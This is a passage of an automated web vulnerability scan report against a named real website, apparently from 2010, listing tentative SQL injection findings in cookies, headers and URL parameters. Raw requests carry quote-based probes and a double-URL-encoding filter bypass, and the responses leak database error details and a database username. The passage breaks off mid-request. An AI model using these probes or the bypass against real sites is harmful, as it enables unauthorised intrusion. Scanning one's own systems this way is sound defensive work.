The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?1%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:23:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?1%2527%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:23:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.108. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.109. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:25 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.110. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:20:46 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:20:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.111. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:15:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:15:19 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.112. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:16:22 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:16:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.113. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [7876d45a49f537da76cfb9e129203eee cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The 7876d45a49f537da76cfb9e129203eee cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7876d45a49f537da76cfb9e129203eee cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 7876d45a49f537da76cfb9e129203eee cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:19:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:19:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:19:31 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:19:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.114. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html%2527?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:32:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html%2527%2527?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
